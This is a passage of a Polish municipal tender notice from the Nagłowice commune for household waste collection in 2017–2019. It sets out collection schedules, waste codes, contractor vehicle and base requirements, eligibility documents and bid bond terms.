3) zużyty sprzęt elektryczny i elektroniczny, baterie gromadzone w workach o poj. 60l lub 120l przekazywane będą przez właścicieli nieruchomości do punktu selektywnej zbiórki odpadów na terenie oczyszczalni ścieków ul. Mikołaja Reja 62 w Nagłowicach, skąd będą odbierane na zgłoszenie Zamawiającego, a ponadto poprzez odbieranie wystawionych w/w odpadów przez właścicieli przed swoimi nieruchomościami.
              Częstotliwość odbioru z nieruchomości -2 razy w roku,

4) meble i odpady wielkogabarytowe, opony, worki po nawozach, folie i sznurki pochodzące z gospodarstw domowych i rolnych,  przekazywane będą przez właścicieli nieruchomości do punktu selektywnej zbiórki odpadów na terenie oczyszczalni ścieków ul. Mikołaja Reja 62 w Nagłowicach, skąd będą odbierane na zgłoszenie Zamawiającego, a ponadto poprzez odbieranie wystawionych w/w odpadów przez właścicieli przed swoimi nieruchomościami.
Częstotliwość odbioru z nieruchomości 2 razy w roku,

5) z koszy ulicznych o poj. 10l lub 30l
Wykazy ilości i rozmieszczenia koszy i pojemników zostaną przekazane Wykonawcy w dniu podpisania umowy.
Częstotliwość odbioru (przystanki autobusowe, parkingi, miejsca przed kościołami, przy świetlicach, placach zabaw i inne)  według potrzeb, nie rzadziej niż 1 raz na 2 tygodnie. Opróżnianie ma następować na tyle często, aby kosze nie były przepełnione. 
	Natomiast w remizach, co najmniej raz na 3 miesiące (lub na zgłoszenie w zależności od potrzeb raz w miesiącu).
Świetlice wiejskie- 1 raz w miesiącu

6) leki z aptek na terenie gminy, w których znajdują się ustanowione selektywne punkty zbiórki.
    Częstotliwość odbioru  razy na kwartał
Listę aptek Zamawiający przekaże w formie wykazu.


e. PSZOK

1. Do PSZOK będą przyjmowane bez limitu niżej wymienione odpady komunalne, zmieszane oraz zbierane w sposób selektywny z terenu Gminy Nagłowice.  

a)	papier i tektura, odzież i tekstylia
b)	metale
c)	tworzywa sztuczne
d)	opakowania wielomateriałowe
e)	szkło
f)	odpady komunalne ulegające biodegradacji
g)	odpady zielone
h)	meble i inne odpady wielkogabarytowe (umywalki, kabiny prysznicowe, wanny, panele i rury PCV, okna z szybami i itp.) pochodzące z gospodarstw domowych 
i)	detergenty
j)	zużyte baterie i akumulatory
k)	zużyty sprzęt elektryczny i elektroniczny
l)	zużyte opony pochodzące z gospodarstw domowych oraz gospodarstw rolnych bez względu na ich gabaryty
m)	odpady budowlane i rozbiórkowe
n)	odpady zmieszane
o)	popiół ( w miesiącach od października do kwietnia)
p)	worki po nawozach, sznurki oraz folie pochodzące z gospodarstw rolnych (np. folie po sianokiszonkach)

2. Zamawiający wymaga, aby Wykonawca wyposażył Punkt Selektywnej Zbiórki odpadów Komunalnych w następujące kontenery oraz pojemniki:
- pojemnik o pojemności 1 100 litrów w kolorze niebieskim - 1 szt.  
-pojemnik o pojemności 1 100 litrów w kolorze żółtym - 1 szt.  
-pojemnik o pojemności 1 100 litrów w kolorze zielonym - 1 szt.   
-pojemnik o pojemności 1 100 litrów z napisem "sprzęt elektryczny i elektroniczny" - 1 szt.  
- pojemnik o pojemności 1 100 litrów z napisem" odpady biodegradowalne" - 1 szt.  
-pojemnik o pojemności 240 litrów z napisem "baterie i akumulatory" - 1 szt. 
- kontener KP-7 z napisem "odpady wielkogabarytowe"- 1 szt.
- kontener KP-7 z napisem "opony"- 1 szt.
- kontener KP-7 z napisem "odpady budowlane i rozbiórkowe"- 1 szt.
- kontener KP-7 z napisem "popiół"- 1 szt.

3.Wykonawca zobowiązany jest do odbioru z PSZOK-u  w/w odpadów na zgłoszenie zamawiającego w ciągu 48 godzin od zgłoszenia. 

4. Zamawiający wymaga aby Wykonawca dostarczył na jego wezwanie kontenery KP-7 w celu odebrania śmieci z likwidacji dzikich wysypisk. Zamawiający sam dokona oczyszczenia terenu, obowiązkiem Wykonawcy będzie jedynie podstawienie kontenerów oraz odebranie odpadów zmieszanych. Ilość odpadów pochodzących z likwidacji dzikich wysypisk została uwzględniona w łącznej orientacyjnej ilości odpadów komunalnych przewidzianych do odebrania zgodnie z zestawieniem nr 4 pkt. 8

7.2	Wymogi SIWZ wynikające z art. 6 ust. 4 ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku w gminach (tj. Dz. U. z 2016 roku poz. 250) 

7.2.1 Wymogi dotyczące przekazywania odebranych zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania do regionalnych instalacji do przetwarzania odpadów komunalnych  art. 6d ust. 4 pkt.1. 

1)	Wykonawca zobowiązany jest do przekazywania wszystkich odebranych zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania przeznaczonych do składowania do Regionalnej instalacji do przetwarzania odpadów komunalnych(RIPOK)właściwej dla Regionu III lub instalacji przewidzianych do zastępczej obsługi dla tego regionu w przypadku, gdy znajdująca się w niej instalacja uległa awarii lub nie może przyjmować odpadów z innych przyczyn.

2)	Wykonawca zobowiązany jest zagospodarować wszystkie odebrane odpady zebrane selektywnie według powszechnie obowiązujących przepisów prawa.

3)	Wykonawca zobowiązany jest do przekazywania selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania, zgodnie z hierarchią powstępowania z odpadami, określoną w obowiązujących przepisach prawa, w szczególności w ustawie o odpadach z dnia 14 grudnia 2012 r. art. 17 (Dz.U. z 2013 poz. 21 z póź. zm.) lub samodzielnego zagospodarowania zgodnie z obowiązującymi przepisami.

7.2.2 Rodzaje odpadów komunalnych odbieranych selektywnie od właścicieli nieruchomości - art. 6d ust. 4 pkt. 2. ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku w gminach (tj. Dz. U. z 2016 roku poz. 250)
A). W sposób selektywny na nieruchomościach gromadzone będą i odbierane następujące odpady komunalne:
a)	 papier, tektura (kod odpadu  15 01 01, 20 01 01)
b)	odzież, tekstylia (kod odpadu 20 01 10,20 01 11)
c)	 szkło (kod odpadu 15 01 07,20 01 02)
d)	 tworzywa sztuczne (kod odpadu 15 01 02,20 01 39)
e)	metal (kod odpadu 15 01 04, 20 01 40)
f)	  inne niewymienione frakcje zbierane w sposób selektywny (kod odpadu 20 01 99)
g)	 odpady ulegające biodegradacji (kod odpadu 20 01 08)
h)	detergenty (kod odpadu 20 01 29*, 20 01 30))
i)	 akumulatory (kod odpadu  20 01 34)
j)	 odpady wielkogabarytowe (kod odpadu 20 03 07)
k)	 odpady budowlane i rozbiórkowe (kod odpadu ex 20 03 99)
l)	odpady komunalne niewymienione w innych podgrupach (kod odpadu 20 03 99)
m)	leki (kod odpadu 20 01 31*, 20 01 32)
n)	zużyte opony( kod odpadu 16 01 03)
o)	zużyty sprzęt elektryczny i elektroniczny( 20 01 35*,20 01 36,20 01 23*)
p)	baterie ( 20 01 33*, 20 01 34)
B). Odpady komunalne niesegregowane (kod odpadu 20 03 01).

7.3 Obowiązek prowadzenia dokumentacji związanej z działalnością objętą zamówieniem  art. 6 d ust. 4 pkt. 4 ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku w gminach (tj. Dz. U. z 2016 roku poz. 250)
- Wykonawca w trakcie realizacji zamówienia ma obowiązek prowadzenia pełnej dokumentacji wymaganej obowiązującymi w danym czasie przepisami prawa, odzwierciedleniem, której będą półroczne sprawozdania. 
- Sprawozdanie należy przekazać na obowiązującym druku w formie elektronicznej na adresy: gmina@naglowice.pl; marta.mularczyk-wojcik@naglowice.pl i papierowej na adres Urząd Gminy w Nagłowicach ul. Mikołaja Reja 9; 28-362 Nagłowice w ustawowym terminie.
- Sprawozdanie winno być opatrzone datą oraz imieniem i nazwiskiem osoby go sporządzającej w imieniu Wykonawcy oraz uzyskać akceptację osoby reprezentującej Wykonawcę.
- W celu weryfikacji danych zawartych w sprawozdaniu, o którym mowa wyżej, Wójt Gminy Nagłowice może zobowiązać Wykonawcę odbierającego odpady komunalne od właścicieli nieruchomości do okazania dokumentów sporządzanych na potrzeby ewidencji odpadów oraz dokumentów potwierdzających osiągnięcie określonych poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania.
- W przypadku, gdy sprawozdanie jest sporządzone nierzetelnie Wójt Gminy Nagłowice wezwie Wykonawcę, który przekazał sprawozdanie, do jego uzgodnienia lub poprawienia w terminie 14 dni.
7.4 Szczegółowe wymagania stawiane Wykonawcom odbierającym odpady komunalne od właścicieli nieruchomości  art. 6d ust. 4 pkt. 6.  ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku w gminach (tj. Dz. U. z 2016 roku poz. 250) 

Wykonawca ubiegający się o realizację zamówienia jest obowiązany:

A) posiadać bazę magazynowo  transportową, do której ma tytuł prawny usytuowaną w gminie Nagłowice lub w odległości nie większej niż 60 km od jej granic, która jest wyposażona:
a)	w miejsca do parkowania pojazdów
b)	w pomieszczenia socjalne dla pracowników
c)	w miejsca do magazynowania selektywnie zebranych odpadów
d)	w legalizowaną samochodową wagę najazdową
e)	w punkt bieżącej konserwacji i naprawy pojazdów
f)	w miejsce do mycia i dezynfekcji pojazdów
g) zamawiający dopuszcza zlecenia usług mycia i dezynfekcji pojazdów przez uprawnione podmioty zewnętrzne poza terenem bazy magazynowo-transportowej
B) zabezpieczyć teren bazy materiałowo  transportowej przed wstępem osób nieupoważnionych;
C)zabezpieczyć miejsca parkowania samochodów przed emisją zanieczyszczeń do gruntu;
D)zabezpieczyć miejsca gromadzenia selektywnie zebranych odpadów komunalnych przed emisją zanieczyszczeń do gruntu oraz zabezpieczyć je przed działaniem czynników atmosferycznych  a także utrzymywać we właściwym stanie sanitarno  technicznym;
E) wyposażyć teren bazy w urządzenia odprowadzające wody opadowe i ścieki przemysłowe w/g ustawy prawo wodne (Dz. U. z 2015 r. poz. 469 z poź zm.);
F) posiadać, co najmniej 1 pojazd przystosowany do odbioru kontenerów KP-7, 1 pojazd przystosowany do odbierania selektywnie zebranych odpadów, a także, co najmniej 1 pojazd do odbierania zmieszanych odpadów komunalnych oraz co najmniej 1 pojazd do odbierania odpadów bez funkcji kompaktującej, oraz posiadać, co najmniej 1 pojazd przystosowany do odbioru odpadów komunalnych, który dotrze w tereny trudno dostępne(np. drogi polne, leśne -nieutwardzone), 
G) po zakończonej pracy parkować pojazdy każdego dnia wyłącznie na terenie bazy;
H) zapewnić spełnienie przez pojazdy następujących wymagań:
a)	pojazdy muszą być zabezpieczone przed rozwiewaniem i rozpylaniem przewożonych odpadów,
b)	pojazdy muszą być wyposażone w monitoring na systemie pozycjonowania satelitarnego, umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu i miejscach postoju. Dane o położeniu pojazdów pochodzące z monitoringu powinny być przechowywane w siedzibie Wykonawcy przez okres 5 lat od dnia ich zapisania. Wykonawca powinien posiadać oprogramowanie oraz odpowiednie licencje umożliwiające odczyt, prezentację i weryfikację przechowywanych danych oraz udostępnić je na każde żądanie Zamawiającego, a także organom kontroli. 
c)	pojazdy muszą być wyposażone w czujniki zapisujące dane o miejscach wyładunku odpadów,
d)	pojazdy muszą posiadać narzędzia umożliwiające sprzątanie terenu po opróżnieniu pojemników,
e)	dopuszcza się wyposażenie pojazdów w urządzenia do ważenia odpadów.
I) zarejestrować i zapewnić dopuszczenie do ruchu pojazdów oraz posiadanie aktualnych badań technicznych i świadectwa dopuszczenia do ruchu zgodnie z przepisami ustawy o ruchu drogowym.
J) Zamawiający wymaga od Wykonawcy odpowiedniego oznakowania samochodów, nazwą firmy i danymi do kontaktu a ponadto umieszczenia napisów adekwatnych do przeznaczenia odpady komunalne dla odpadów zmieszanych lub pozostałych z segregacji i surowce wtórne dla odbioru odpadów segregowanych. Oznakowanie pojazdów powinno być zgodne z obowiązującymi przepisami Rozporządzenia Ministra Środowiska z dnia 7 października 2016r. w sprawie szczegółowych wymagań dla transportu. (Dz.U.2016r poz.1742).
<br /><br /><b>II.5) Główny kod CPV: </b>90511000-2<br /><b> Dodatkowe kody CPV:</b>90512000-9,
                90513100-7,
                90514000-3<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data rozpoczęcia: 01/01/2017
                    data zakończenia: 30/06/2019<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                a). Wykonawca winien wykazać posiadanie zezwolenia na prowadzenie działalności w zakresie  transportu i zbierania odpadów komunalnych od właścicieli nieruchomości wydane w formie decyzji
b). Wykonawca winien wykazać posiadanie wpisu do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, prowadzonego przez Wójta Gminy Nagłowice jako organu właściwego
<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                a). Wykonawca winien wykazać posiadanie środków finansowych lub zdolności kredytowej w wysokości co najmniej 100 000,00 zł 
b). Wykonawca winien wykazać, iż jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną co najmniej 100 000,00 zł 
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                a). Wykonawca winien wykazać wykonanie, a w przypadku świadczeń okresowych lub ciągłych wykonywanie, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie - usługi bądź usług polegających na odebraniu odpadów komunalnych o łącznej masie minimum 250 Mg w ciągu 12 miesięcy.
b). Wykonawca winien wykazać posiadanie bądź dysponowanie co najmniej:
- jednym samochodem specjalistycznym  do odbioru odpadów zmieszanych
- jednym samochodem specjalistycznym do odbioru selektywnie zebranych odpadów
- jednym samochodem do odbioru odpadów bez funkcji kompaktującej do odbioru selektywnie zebranych odpadów
- jednym pojazdem typu hakowiec do transportu kontenerów typu KP7,
- jednym pojazdem przystosowanym do odbioru odpadów z  nieruchomości o utrudnionym dojeździe (np. drogi polne, leśne -nieutwardzone).
c). Wykonawca winien posiadać bazę magazynowo  transportową, do której ma tytuł prawny, usytuowaną w gminie Nagłowice lub w odległości nie większej niż 60 km od granic gminy Nagłowice.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1. odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej  w celu potwierdzenia braku podstaw do wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy pzp
2. w celu potwierdzenia braku postaw do wykluczenia na podstawie art. 24 ust. 5 pkt 8 ustawy pzp:
a) zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub inny dokument potwierdzający, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu

b) zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument potwierdzający, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub inny dokument potwierdzający, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu

</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />
a). zezwolenie wydane w formie decyzji na prowadzenie działalności w zakresie  zbierania i transportu odpadów komunalnych od właścicieli nieruchomości 
b). wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, prowadzonego przez Wójta Gminy Nagłowice jako organu właściwego 
Wymagana forma dokumentów  oryginał bądź kopia potwierdzona za zgodność z oryginałem przez wykonawcę lub upoważnionego pełnomocnika
c). informację banku lub spółdzielczej kasy oszczędnościowo  kredytowej potwierdzającej posiadanie środków finansowych lub zdolności kredytowej Wykonawcy w wysokości co najmniej 100 000,00 zł, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert. 
Wymagana forma dokumentu  oryginał bądź kopia potwierdzona za zgodność z oryginałem przez wykonawcę lub upoważnionego pełnomocnika
d). dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną co najmniej 100 000,00 zł 
Wymagana forma dokumentu  oryginał bądź kopia potwierdzona za zgodność z oryginałem przez wykonawcę lub upoważnionego pełnomocnika
e). wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, spełniający wymagania określone w rozdz. VI pkt. 1 ppkt 1.3 lit a). wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane  sporządzony wg załącznika nr 5 do niniejszej SIWZ. Do przedmiotowego wykazu należy dołączyć dowody określające czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których  mowa mogą być referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy. W przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Wymagana forma dokumentu:
- wykaz  oryginał
- dowody - oryginał bądź kopia potwierdzona za zgodność z oryginałem przez wykonawcę lub upoważnionego pełnomocnika
f). wykaz dostępnych Wykonawcy w celu wykonania zamówienia pojazdów (samochodów), spełniający wymagania określone w rozdz. VI pkt. 1 ppkt. 1.3 lit b). ,wraz z informacją o podstawie do ich dysponowania- sporządzony wg załącznika nr 6 do niniejszej SIWZ.
Wymagana forma dokumentu - oryginał
g). wykaz w formie informacji Wykonawcy o posiadaniu bazy magazynowo  transportowej o odpowiednim stanie technicznym oraz wyposażeniu umożliwiającym odbieranie odpadów komunalnych zgodnym z rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013 r. poz. 122) wraz z kserokopiami dokumentów potwierdzających fakt jej posiadania Wymagana forma dokumentów:
- informacja  oryginał sporządzony wg załącznika nr 7 do niniejszej SIWZ
- dokumenty potwierdzające fakt posiadania bazy magazynowo  transportowej -  oryginał bądź kopia potwierdzona za zgodność z oryginałem przez wykonawcę lub upoważnionego pełnomocnika.

<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">a). wypełniony formularz oferty  sporządzony wg załącznika nr 1 do SIWZ.

b). pełnomocnictwo  w przypadku, gdy upoważnienie osoby/osób podpisujących ofertę nie wynika wprost z dokumentu/dokumentów stwierdzających status prawny wykonawcy. 
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1. Zamawiający wymaga złożenia wadium w wysokości 15 000,00 zł (słownie: piętnaście tysięcy złotych).
2. Wadium należy wnieść przed upływem terminu składania ofert, określonym w rozdz. XIV pkt. 1 niniejszej SIWZ.
3. Wadium może być wnoszone w jednej lub kilku następujących formach:
a). pieniądzu;
b). poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo  kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c). gwarancjach bankowych;
d). gwarancjach ubezpieczeniowych;
e). poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2014 r. poz. 1804 oraz z 2015r. poz.978 i 1240) .
4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego Bank Spółdzielczy w Kielcach, Oddział Nagłowice Nr 51 8493 0004 0110 0100 0332 0007 z dopiskiem Wadium w przetargu nieograniczonym  Odbieranie i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych z terenu Gminy Nagłowice w okresie od dnia 01 stycznia 2017 roku do dnia 30 czerwca 2019 r.
Aby wadium wnoszone w pieniądzu było skutecznie ważne musi się znajdować na wyżej wymienionym koncie zamawiającego przed upływem terminu składania ofert, a tym samym wykonawca musi uwzględnić przy tej formie wnoszenia wadium czasookres operacji bankowych zarówno w banku wykonawcy jak i w banku zamawiającego (operacja bankowa dla uznania rachunku zamawiającego).  Przy wpłacie wadium na konto bankowe należy uwzględnić wszelkie opłaty naliczane przez dany Bank. Zamawiający nie dopuszcza aby opłaty pobierane przez bank potrącane były z kwot wadium pod rygorem odrzucenia oferty tj. na koncie zamawiającego zaksięgowana winna być kwota w wysokości wymaganego wadium.
5. W treści wadium składanego w formie innej niż pieniądz muszą być wyszczególnione okoliczności, w jakich zamawiający może je zatrzymać. Okoliczności te muszą zawierać sytuacje określone:
a). w art. 46 ust. 4a ustawy pzp, tj. jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a ustawy pzp, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 ustawy pzp, oświadczenia, o którym mowa w art. 25a ust.1 ustawy pzp, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy pzp, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
b). w art. 46 ust. 5 ustawy pzp tj.: jeżeli wykonawca, którego oferta została wybrana:
- odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
- nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
6. Poza powyższymi zapisami, z treści wadium składanego formie innej niż pieniądz powinno wynikać jednoznacznie, gwarantowanie wypłaty należności w sposób nieodwołalny, bezwarunkowy i na pierwsze żądanie. Wadium takie powinno obejmować cały okres związania ofertą, poczynając od daty składania ofert.
7. Wadium w formie innej niż pieniądz należy złożyć łącznie z ofertą, dopuszcza się jego złożenie w oddzielnej kopercie.
8. Wadium złożone przez jednego ze wspólników konsorcjum uważa się za wniesione prawidłowo.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
